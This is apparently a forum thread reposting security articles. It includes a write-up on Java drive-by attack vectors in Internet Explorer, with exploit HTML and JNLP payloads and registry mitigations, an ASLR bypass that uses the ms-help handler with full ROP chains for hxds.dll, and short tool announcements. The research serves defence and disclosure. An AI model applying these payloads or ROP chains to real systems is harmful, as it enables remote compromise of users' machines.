<APPLET code="Exploit.class" width="1" height="1"></APPLET> Prevent loading of applet in all IE zones This settings stops the loading of Java in all IE browser zones. This might be a problem internally in organisations which depend on the applet tag. ; "UseJava2IExplorer"=dword:00000000 <-- disable loading of Java applet ; "UseJava2IExplorer"=dword:00000001 <-- enable loading of Java applet ; [HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\10.7.2] "UseJava2IExplorer"=dword:00000000 An issue with this mitigation is that each time Java is installed the mitigation gets reset to its default value as a new Java version registry key is added. 10.4.0 – Java 7 update 4 10.6.2 – Java 7 update 6 10.7.2 – Java 7 update 7 10.9.2 – Java 7 update 9 Once mitigation has been made a popup would be seen first time. If the check box is ticked “Do not show this message again” it writes to the registry entry below [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Declined Install On Demand IEv5] "{08B0e5c0-4FCB-11CF-AAA5-00401C608501}"="" This mitigation only stops exploits using the applet tag, cannot be managed by Internet Explorer zones and any new Java update means you’ll need to update the registry again. Invoking Java classids via OBJECT tag Internet Explorer can use the classid attribute OBJECT tag to load Java. Hundreds of Java classids gets registered when Java is installed. One classid is particularly dangerous as it works transparently from the Internet zone without any notification bars or alerts and has been used in actual exploits. The reason being is that this classid gets added in the preapproved list. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{8AD9C840-044E-11D1-B3E9-00805F499D93} This classid calls the latest installed version of Java Plug-in installed on the machine. Whats interesting is that this classid is already added in Windows 7 preapproved registy key without even Java being installed. To mitigate this classid needs to be killbitted [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Compatibility Flags"=dword:00000400 To exploit it can be called like this <OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Another way to mitigate this classid is to disable the Java Plugin’s ActiveX control through IE’s “Manage Add-ons”. Once disabled it writes to the registry below and settings are retained even after a Java update though I prefer the killbit option. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Flags"=dword:00000001 "Version"="*" The hundreds of other classids are mainly for backwards compatibility. So if an older specific version of Java is installed, those can be called using a specific classid, in the example below its calling Java 7 update 7 <OBJECT classid="clsid:CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Or to invoke the latest Java 7 version installed <OBJECT classid="clsid:CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> The way the classid versions is worked out is in say CAFEEFAC-xxxx-yyyy-zzzz-ABCDEFFEDCBA, “xxxx”, “yyyy”, and “zzzz” are four-digit numbers to identify the specific version of Java Plug-in to be used. In references [1][2] only a handful of classid’s listed below but actually when Java gets installed it installs hundreds of classids. Click here to see all the CAFEEFAC- classid’s registered on a Java 7 update 4 installation. In these references just killbitting these classids does not make sense as invoking any other classid will give the same two prompts as these ones. (screenshots given further down in the Java Web Start ActiveX control section). So if you are thinking of killbitting these classids then follow Cert’s recommendation [4] as it kills all classids upto a certain version. A Java update will register newer classids each time so if killbitting these is an option you prefer then you’ll need to keep uptodate. These classid’s are the only ones mentioned for Java version 7 and upto update 6. CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0001-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0002-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0003-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0004-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0005-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA So CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA might have been killbitted but if you know the Java version you are attacking you could use CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC Another classid registered invokes an old version of Java and to exploit using this classid you’ll have to deal with a third warning window prompt and thiswould come up everytime. To exploit <HTML> <OBJECT CLASSID="clsid:E19F9331-3110-11D4-991C-005004D3B3DB" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> </HTML> And to mitigate killbit the control [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}] "Compatibility Flags"=dword:00000400 Loading Java via the EMBED tag Java can also be exploited in Internet Explorer using the EMBED tag. Here applet mitigations is ineffective but killbitting/disabling the ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 as mentioned in previous section mitigates it. To exploit <HTML> <EMBED code="Exploit.class" type="application/x-java-applet" width="1" height="1"></EMBED> </HTML> Here the the mimetype “application/x-java-applet” points back to classid 8AD9C840-044E-11D1-B3E9-00805F499D93 Prevent automatically opening JNLP files via APPLET Java Network Launch Protocol (JNLP) could also be used for launching applets directly from JNLP files. To launch an applet from a JNLP file the “jnlp_href” parameter would need to be used in the applet tag. This could be used in a transparent driveby attack too. <HTML> <APPLET><param name="jnlp_href" value="mycalc.jnlp"></APPLET> </HTML> The jnlp file doesnt need to contain the full url path <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> When calling the jnlp file via the html file the jnlp file can be any extension so say in the above code mycalc.jnlp could be called mycalc.txt. Since this uses the applet tag the above mitigation on the applet would mitigate this threat. Double-clicking on a JNLP file Even with all the browser mitigations in place it doesnt stop an attacker to email a jnlp file to the victim. Just by double-clicking the attachment would compromise the machine. <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="http://192.168.1.3/calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> One way to mitigate is to change the file association and/or block jnlp file attachments on your mail relays. HKLM\SOFTWARE\Classes\JNLPFile\Shell\Open\Command\: “”C:\Program Files\Java\jre7\bin\javaws.exe” “%1?” Prevent automatically opening JNLP files via mimetype association Using Java Web Start can be used to open a JNLP file. By default JNLP files open without any interaction from the user. For this to be exploited the web server would have to be configured with the .jnlp file extension to the mimetype “application/x-java-jnlp-file”. Then simply visiting a link say http://192.168.1.3/mycalc.jnlp would compromise your box. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+"/> <jar href="calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> Signing your own app and using jnlp code below could be used but user interaction is required and you don’t need a vulnerability for this one. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <security> <all-permissions/> </security> <resources> <jar href="mycalc_signed.jar" main="true"/> </resources> <application-desc name="Calculator" main-class="mycalc" width="1" height="1"> </application-desc> </jnlp> To mitigate we can change the default setting of EditFlags to all zeros which will then prompt the user. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile] "EditFlags"=dword:00000000 On the Cert advisory EditFlags is a binary value but a dword value can also be used. Prevent automatically opening JNLP files via ActiveX Control Using Java Web Start ActiveX control can also be used to run a JNLP file but user interaction is required. To exploit <HTML> <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" width="1" height="1"> <PARAM name="app" value="http://192.168.1.3/mycalc.jnlp"> </OBJECT> </HTML> and the JNLP file is <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> To mitigate killbit this classid [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}] "Compatibility Flags"=dword:00000400 Java Deployment Toolkit ActiveX Controls This Java Deployment Toolkit classid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA was exploited in 2010 (CVE-2010-1423). On a fully patched Windows 7 machine this has already been killbitted without even Java being installed and points to an alternate classid CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA. This classid has been killbitted in Cert’s mitigation so its recommended to keep this one killbitted too. [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}] "Compatibility Flags"=dword:00000400 Preventing compromise So what it comes down to is just these few changes on your system prevent it from being compromised automatically by a drive by attack. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile] "EditFlags"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] "1C00"=dword:00000000 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Compatibility Flags"=dword:00000400 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}] "Compatibility Flags"=dword:00000400 Renaming the “jp2iexp.dll” file would also temporarily mitigate the APPLET and OBJECT tag attack vectors but not the others mentioned. A Java update installation would drop the file back though so bear that in mind. Other classids that would need some interaction are also best to be killbitted [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}] "Compatibility Flags"=dword:00000400 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}] "Compatibility Flags"=dword:00000400 Using the latest classids for the Java version would require the user to acknowledge two warnings but once accepted thereafter no warning would be given so killbitting the CAFAEFAC- classids might be worth thinking about in your managed environment. Finally JNLP files could be sent via email so you might want to take a proactive step in blocking jnlp file attachments on your mail relays. Latest Java release Following the release of Java 7 update 10 last week I thought I’d do a quick check on its new security features. There is now an updated security tab giving the user now more control on what to do. Changing the security levels makes changes to the file deployment.properties in location C:\Users\user1\AppData\LocalLow\Sun\Java\Deployment By default its set to medium but if changed to low the entry deployment.security.level=LOW is added to the file. Since this is in a low integrity folder this could be changed to LOW settings by a low privileged user. #deployment.properties #Wed Dec 19 17:48:16 GMT 2012 deployment.modified.timestamp=1355939296772 deployment.version=7.0 deployment.security.level=LOW deployment.webjava.enabled=false #Java Deployment jre's #Wed Dec 19 17:48:16 GMT 2012 deployment.javaws.jre.0.registered=true deployment.javaws.jre.0.platform=1.7 deployment.javaws.jre.0.osname=Windows deployment.javaws.jre.0.path=C\:\\Program Files\\Java\\jre7\\bin\\javaw.exe deployment.javaws.jre.0.product=1.7.0_10 deployment.javaws.jre.0.osarch=x86 deployment.javaws.jre.0.location=http\://java.sun.com/products/autodl/j2se deployment.javaws.jre.0.enabled=true deployment.javaws.jre.0.args= Un-checking the “Enable Java content in the browser” is quite drastic step as it deletes all classids, mimetypes, jnlp file association, etc. The command that gets run when un-checking and applying is "C:\PROGRA~1\Java\jre7\bin\ssvagent.exe" -disablewebjava This feature would most definitely protect from browser based attacks but also most likely break all your internal apps so not something to implement without thorough testing in an enterprise environment. For home users it gives the flexibility to enable and disable when needed say if you want to do a vulnerability scan which uses Java. Conclusion This research has shown that if you dont need Java best to just to uninstall it. If there is a requirement then upgrade to Java 7u10 and uncheck the Java content in the browser settings. Finally follow only Certs advisory [4] or the very least make the few mitigating changes mentioned in the “Preventing compromise” section regardless if you have “Java Content in the browser” enabled or disabled. References: [1] How to disable Java – Internet Explorer | Naked Security [2] How to disable the Java web plug-in in Internet Explorer [3] Internet Explorer security zones registry entries for advanced users [4] US-CERT Vulnerability Note VU#636312 - Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code [5] How to Unplug Java from the Browser — Krebs on Security [6] Controlling Java in Internet Explorer - IEInternals - Site Home - MSDN Blogs [7] Using APPLET, OBJECT and EMBED Tags [9] Java[tm] Web Start Developer's Guide [10] JNLP File Syntax [11] JNLP Support in the Next Generation Java™ Plug-In Technology (introduced in Java SE 6 update 10) [12] Setting the Security Level of the Java Client Sursa: Exploiting and mitigating Java exploits in Internet Explorer | GreyHatHacker.NET

Bypassing Microsoft Windows ASLR with a little help by MS-Help Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed as it got shipped with non aslr msvcr71.dll library. Now that Java 7 has been out for a while hopefully everyone should be using this version as msvcr71.dll does not exist with Java 7. With this in mind creating a reliable ROP chain is going to be difficult again as finding some information leak my guess is not going to be a straight forward not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office. Windows 7 only After carrying out a default installation of Windows 7 sp1 (Enterprise) and getting it all up-to-date with patches I carried out a scan of all non aslr DLLs on the system and was amazed to find nearly 600 non alsr DLLs. Ok a lot were duplicates so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag so after searching for clsid string in the DLLs one library stood out “VsaVb7rt.dll” Filename - VsaVb7rt.dll Path - C:\Windows\Microsoft.NET\Framework\v2.0.50727\ MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c Size - 1,340,752 bytes Signed - 29th September 2010 08:46:12 After obtaining the classid guid using the tool Bintext I loaded it up in the browser <HTML> <OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F' </OBJECT> </HTML> The issue with loading libraries via guids is that user interaction is first required before exploiting so in the real world this would not be a viable option unless your testing your own exploits from a specific address. Once accepting the security warning it writes to the registry entry below Windows 7 with MSOffice 2007/2010 With Windows 7 being a failure I turned my attention to Office 2007. As most users running Windows 7 should be running Office 2010 or the very least running Office 2007. After a default installation of “Microsoft Office 2007 Plus”, getting it fully up-to-date and carrying a another scan a number of additional non aslr DLLs where found that could be loaded via its own guids as above but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction and that library being “hxds.dll” . This library can be loaded using its protocol handler by location.href = ‘ms-help:’ <SCRIPT language="JavaScript"> location.href = 'ms-help:' </SCRIPT> This library does not get rebased either so is perfect for our ROP chain. Carrying out the same routine with “Microsoft Office 2010 Plus” I found the same library “hxds.dll” that we can use but our ROP chain would be different as the file has been updated. Details of the library on Office 2007 Filename - hxds.dll Path - C:\Program Files\Common Files\microsoft shared\Help\ MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8 Size - 873,216 bytes Signed - 19th August 2006 11:52:41 Details of the library on Office 2010 Filename - hxds.dll Path - C:\Program Files\Common Files\microsoft shared\Help\ MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83 Size - 877,368 bytes Signed - 23rd May 2009 12:24:33 Here is the ROP chain generated by Mona.py on Office 2007 0x51be25dc, # POP EDI # RETN [hxds.dll] 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll] 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll] 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll] 0x51bf1761, # POP EBP # RETN [hxds.dll] 0x51c4b2df, # & call esp [hxds.dll] 0x51bf2e19, # POP EBX # RETN [hxds.dll] 0x00000201, # 0x00000201-> ebx 0x51bfa969, # POP EDX # RETN [hxds.dll] 0x00000040, # 0x00000040-> edx 0x51c385a2, # POP ECX # RETN [hxds.dll] 0x51c5b991, # &Writable location [hxds.dll] 0x51bf7b52, # POP EDI # RETN [hxds.dll] 0x51c3f011, # RETN (ROP NOP) [hxds.dll] 0x51c433d7, # POP EAX # RETN [hxds.dll] 0x90909090, # nop 0x51c0a4ec, # PUSHAD # RETN [hxds.dll] and the ROP chain on Office 2010 0x51bf34b4, # POP ESI # RETN [hxds.dll] 0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll] 0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] 0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll] 0x51c379e2, # POP EBP # RETN [hxds.dll] 0x51c59683, # & call esp [hxds.dll] 0x51be198c, # POP EBX # RETN [hxds.dll] 0x00000201, # 0x00000201-> ebx 0x51c35ac3, # POP EDX # RETN [hxds.dll] 0x00000040, # 0x00000040-> edx 0x51becf3e, # POP ECX # RETN [hxds.dll] 0x51c5d150, # &Writable location [hxds.dll] 0x51bef563, # POP EDI # RETN [hxds.dll] 0x51c07402, # RETN (ROP NOP) [hxds.dll] 0x51c56fbd, # POP EAX # RETN [hxds.dll] 0x90909090, # nop 0x51c3604e, # PUSHAD # RETN [hxds.dll] In order for our exploit to be successful I’ve seen its best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally here is an exploit (password “answerworks”, md5hash 5bc94894890298710f30d91d6104e568) based from my last post where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll. For now I see two options to mitigate this, one is to disable the protocol handler which can be done easily by changing the name or value in the registry or delete it completely. The downside is that I don’t know how it would impact applications using this handler. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help] @="Help HxProtocol" "CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}" The second option would be to get Microsoft EMET installed if you haven’t already done so and make sure “MandatoryASLR” is enabled for the iexplore.exe process. I can’t emphasize enough how vital it is to have this tool installed so please do not delay and get it deployed ASAP. Sursa: Bypassing Microsoft Windows ASLR with a little help by MS-Help | GreyHatHacker.NET

E Tinkode in caz ca nu v-ati prins.

Pff, si eu voiam sa fac asa ceva. Dar arata foarte bine

Ce barfe despre tine? Avem o alta vedeta? Nu am mai auzit nimic despre tine de la... chestia de dinainte de Defcamp. Cat despre tex lumea vorbeste mult fara sa cunoasca, nici eu nu stiu prea multe, dar eu ma abtin de la diverse comentarii.

Mptcp Packet Manipulator 1.9.0 Authored by Khun | Site hexcodes.org Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address. Changes: Added support for Display Packet Content (tcpdump style). More hard compiler optimizations. Full support for Darwin OS. Various other additions and improvements. Download: http://packetstormsecurity.org/files/download/119132/mptcp-1.9.0.tar.gz Sursa: Mptcp Packet Manipulator 1.9.0 ? Packet Storm

Malheur Malware Analyzer 0.5.3 Authored by Konrad Rieck | Site mlsec.org Malheur is a tool for automatic analysis of program behavior recorded from malicious software (malware). It is designed to support the regular analysis of malicious software and the development of detection and defense measures. It allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It can be applied to recorded program behavior of various formats as long as monitored events are separated by delimiter symbols, e.g. as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox, and Joebox. Changes: The tool's persistent state is stored in the local state directory for better maintenance. Several minor bugs have been fixed. Download: http://packetstormsecurity.org/files/download/119128/malheur-0.5.3.tar.gz Sursa: Malheur Malware Analyzer 0.5.3 ? Packet Storm

Insecure Authentication Control In J2EE Authored by Ashish Rao This is a whitepaper discussing insecure authentication control in J2EE implemented using sendRedirect(). Download: http://packetstormsecurity.org/files/download/119129/insecureauth-j2ee.pdf Sursa: Insecure Authentication Control In J2EE ? Packet Storm

Hashcat's GPU-accelerated Gauss encryption cracker GReAT Kaspersky Lab Expert Posted December 28, 10:45 GMT 2012 was a year full of major security incidents: Flame, Shamoon, Flashback, Wiper, Gauss, and so on. As we are about to turn the page, many unsolved mysteries remain still. Perhaps the most interesting unsolved mysteries are related to the Gauss Trojan: the Palida Narrow font and the unknown encrypted payload. Previously, we’ve published a blogpost about the encrypted payload hoping that the crypto community will take on the challenge and break the encryption scheme to reveal the true purpose of the mysterious malware. Yesterday, Jens ‘atom’ Steube, who is best known as the author of ‘(ocl)hashcat’ - a GPU accelerated password recovery tool, released his Gauss cracker as open source software under a GPL license. This is a major breakthrough towards solving the Gauss encryption scheme because of the speeds it achieves: 489k c/s on a AMD Radeon HD 7970 card. If you’re wondering, this is over 30 times faster than an AMD FX 8120 CPU. You can download the sources and Linux binary from Jens’ 'hashcat' page. Happy New (Cracking) Year! Download: https://hashcat.net/oclGaussCrack/ Sursa: Hashcat's GPU-accelerated Gauss encryption cracker - Securelist